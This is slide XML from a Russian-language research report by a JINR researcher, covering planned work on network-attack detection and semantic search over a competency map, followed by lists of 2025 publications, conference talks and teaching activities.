            <a:ext cx="11608920" cy="5564753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20000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Валидация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разработанной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модели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обнаружения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сетевых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атак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на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данных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запросов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к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более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широкому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набору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цифровых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сервисов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ОИЯИ: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Font typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pP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Сбор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и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предобработка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данных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.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Font typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pP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Обучение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модели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на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выборках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данных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,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не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содержащих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паттерны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сетевых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атак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.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Font typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pP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Анализ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результатов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работы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на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тестовых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данных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и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оценка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точности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модели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.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Развитие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алгоритма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семантического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поиска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по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накопленной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базе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данных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цифровой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карты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компетенций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по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детекторным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и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ускорительным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технологиям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ОИЯИ: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Font typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pP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Создание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размеченного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набора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данных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для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оценки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качества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работы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модели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.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Font typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pP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Сравнение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результатов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работы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с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моделями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других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0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семейств</a:t>
            </a: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.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Разработка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подхода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к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семантической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+mn-lt"/>
              </a:rPr>
              <a:t>адаптации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 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+mn-lt"/>
              </a:rPr>
              <a:t>в практических задачах</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="893763" lvl="1" indent="-32385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lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Генерация небольших связных текстов на основе статистики n-грамм (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>униграмм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, биграмм, триграмм) с использованием марковской сети (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Markov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) в задаче компетентностного моделирования.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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893763" lvl="1" indent="-32385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lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Решение задачи компетентностного моделирования с помощью ИИ-моделей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TinyLlama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Phi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (Phi-2, Phi-3) с квантизацией "в режиме" CPU. </a:t>
            </a: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lang="ru-RU" sz="2800" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Создание прототипа системы компетентностного моделирования как структурной части (модуля) платформы количественного исследования рынка труда и анализа соответствия образовательных программ потребностям рынка.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DDE8A1-183C-46EB-87EA-F0798F419E0E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24BED45A-FAF2-4748-A0DF-D3EAEA5126C6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C33AA6B-2DA6-4F45-9072-C9034CEA700D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32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6" name="Таблица 1194098091"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="257400" y="683280"/>
          <a:ext cx="11613240" cy="5373960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5806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26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14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Список научных работ за 2025 г.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14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Участие в научных мероприятиях за 2025 г.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3760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="217800" indent="-217800" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="564"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="222222"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Ilina, A. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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Practical Comparative Analysis of Named Entity Recognition Methods for JINR Digital Services</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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. – Physics of Particles and Nuclei Letters (PEPAN Letters). – Vol. 22. – 2025. – P. 1032–1035. – DOI: https://doi.org/10.1134/S1547477125701031.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17800" indent="-217800" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="564"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Ilina A., Zrelov P. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1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Comparative analysis and evaluation of the consistency of methods for integrating semantic representations of texts</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr sz="1200"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="0" i="1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(прошла этап рецензирования, рекомендована к публикации в Physics of Elementary Particles and Atomic Nuclei)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7800" indent="-217800" algn="just" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="564"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Ilina A, et al. Digital technology map: detectors, accelerators, competencies. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1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JINR Association of Young Scientists and Specialists Conference "Alushta-2025"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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 (устный доклад, личное участие).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17800" indent="-217800" algn="just" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="564"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Ilina A, et al. Digital technology map: detectors, accelerators, competencies. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1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61st meeting of the PAC for Nuclear Physics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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 (устный доклад, личное участие).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17800" indent="-217800" algn="just" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="564"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Зрелов П. В., Ильина А. В. Сравнительный анализ и оценка согласованности методов интеграции семантических представлений текстов. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1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11th International Conference "Distributed Computing and Grid Technologies in Science and Education" (GRID`2025)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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 (устный доклад, личное участие).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17800" indent="-217800" algn="just" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="564"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Ilina A. System for DIRAC jobs visualization and its applications. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1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The 11th DIRAC Users' Workshop</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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 (устный доклад, личное участие).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680"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В рамках педагогической деятельности в 2025 г.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3400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="217800" indent="-217800" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="595"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US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Проведение семинаров по дисциплине «</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1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Аналитика Больших данных</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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», Государственный университет «Дубна», 10.02.2025 г. – 24.05.2025 г.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17800" indent="-217800" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="OpenSymbol"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US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Проведение семинаров по дисциплине «</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1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Методы и технологии машинного обучения в прикладных задачах</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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», Государственный университет «Дубна», 0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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09.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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202</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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 г. – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="12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н. вр.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00"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Др</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1400" b="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uFillTx/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>у</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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гое</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU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за 2025 г.</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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1640">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="228600" indent="-228600" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="Calibri Light"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Участие в организационном комитете конференции AYSS-2025 от ЛИТ, 27.10.2015 — 31.10.2025, https://indico.jinr.ru/event/5517/.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28600" indent="-228600" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buClr>
                          <a:srgbClr val="28374A"/>
                        </a:buClr>
                        <a:buFont typeface="Calibri Light"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU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Диплом за лучший устный доклад на конференции "Alushta-2025".</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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58" name="Рисунок 457"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10050480" y="4118400"/>
            <a:ext cx="1767960" cy="2515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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7FE25E-01CA-408D-BCC6-9C36E34A6705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C0BC077-4FBF-4886-80B1-31B23E84A540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1955785-3B80-4646-8161-AE9CD62B9092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33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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360" y="45360"/>
            <a:ext cx="1218996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2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Список основных публикаций за последние 5 лет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3" name="Прямоугольник 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15120" y="714960"/>
            <a:ext cx="12272400" cy="54615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</a:rPr>
              <a:t>Ilina, A. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Practical Comparative Analysis of Named Entity Recognition Methods for JINR Digital Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>. – Physics of Particles and Nuclei Letters (PEPAN Letters). – Vol. 22. – 2025. – P. 1032–1035. – DOI: https://doi.org/10.1134/S1547477125701031.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</a:rPr>
              <a:t>S. Belov, A. Ilina, V. Korenkov, V. Tarabrin, P. Zrelov. – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Exploring the relevance of educational skillset in the labor market through natural language processing techniques.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Physics of Elementary Particles and Atomic Nuclei (PEPAN). – Vol. 55. – 2024. – P. 584–587. – DOI: https://doi.org/10.1134/S106377962403016X.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</a:rPr>
              <a:t>Campis, D., Ilina, A. &amp; Pelevanyuk, I. – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>System for analysis of the performance of scientific jobs in distributed systems.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Physics of Elementary Particles and Atomic Nuclei (PEPAN). – Vol. 55. – 2024. – P. 401–403. – DOI: https://doi.org/10.1134/S1063779624030262.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</a:rPr>
              <a:t>С. Д. Белов, П. В. Зрелов, А. В. Ильина, В. В. Кореньков, В. А. Тарабрин . – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Использование нейросетевых языковых моделей для исследования востребованности профессиональных компетенций высшего образования на рынке труда.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Системный анализ в науке и образовании, ISSN:2071-9612, Изд:Государственный университет "Дубна". – № 3. – 2023. – С. 13-25. URL: https://sanse.ru/index.php/sanse/article/view/585/537.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</a:rPr>
              <a:t>Ilina, A.V., Pelevanyuk, I.S. – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>System for planning and logging excursions at JINR.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Physics of Particles and Nuclei Letters (PEPAN Letters). – Vol. 20. – 2023. – P. 1266-1268. – DOI: https://doi.org/10.1134/S1547477123050382.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</a:rPr>
              <a:t>S. Belov, I. Filozova, Y. Gavrilenko, A.V. Ilina, J. Javadzade, I. Kadochnikov, V. Korenkov, I. Pelevanyuk, D. Priakhina, R. Semenov, V. Tarabrin and P. Zrelov. – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Methods and algorithms of the analytical platform for analyzing the labor market and the compliance of the higher education system with market needs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Proceedings of Science. – Vol. 429. – 2022. – P. 028. – DOI: https://doi.org/10.22323/1.429.0028. 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DE6603B-43C1-4755-96D2-F8555543F14D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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575AE7-813B-40E9-8B26-7E69022C17B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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388CEB-37BB-4659-8496-AAD0B8319BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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34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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360" y="121680"/>
            <a:ext cx="12189960" cy="33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2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Участие в научных мероприятиях в качестве докладчика за последние 5 лет </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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5" name="Прямоугольник 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="583938"/>
            <a:ext cx="12191760" cy="59540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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>The 11th DIRAC Users` Workshop.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – System for DIRAC jobs visualization and its applications. – Beijing, China. – IHEP. – 2025. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>11th International Conference "Distributed Computing and Grid Technologies in Science and Education" (GRID`2025).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Сравнительный анализ и оценка согласованности методов интеграции семантических представлений текстов. – Dubna, Russia. – JINR. – 2025. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>61st meeting of the PAC for Nuclear Physics.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Digital technology map: detectors, accelerators, competencies. – Dubna, Russia. – JINR. – 2025. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>JINR Association of Young Scientists and Specialists Conference "Alushta-2025".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Digital technology map: detectors, accelerators, competencies. – Alushta, Russia. – JINR. – 2025. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>The 28th International Scientific Conference of Young Scientists and Specialists (AYSS-2024).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Practical comparative analysis of named entity recognition methods for JINR digital services. – Dubna, Russia. – JINR. – 2024. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>10th International Conference `Distributed Computing and Grid Technologies in Science and Education` (GRID`2023).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Развитие методов и подходов к анализу рынка труда и определения востребованности программ высшего образования в рамках аналитической платформы Больших данных. – Dubna, Russia. – JINR. – 2023. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>10th International Conference `Distributed Computing and Grid Technologies in Science and Education` (GRID`2023).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – Automated Analysis and Monitoring of Scientific HTC Jobs on Distributed Heterogeneous Computing Resources. – Dubna, Russia. – JINR. 2023. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>The XXVI International Scientific Conference of Young Scientists and Specialists (AYSS-2022).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> – System for planning and logging excursions at JINR. – Dubna, Russia. – JINR. – 2022. – Устный доклад.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600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>The 6th International Workshop on Deep Learning in Computational Physics (DLCP-2022). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>– Analytical platform for intellectual labour market analysis. – Dubna, Russia. – JINR. – 2022.  – Устный доклад.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="-2160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OpenSymbol"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>JINR Association of Young Scientists and Specialists Conference "Alushta-2022". </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
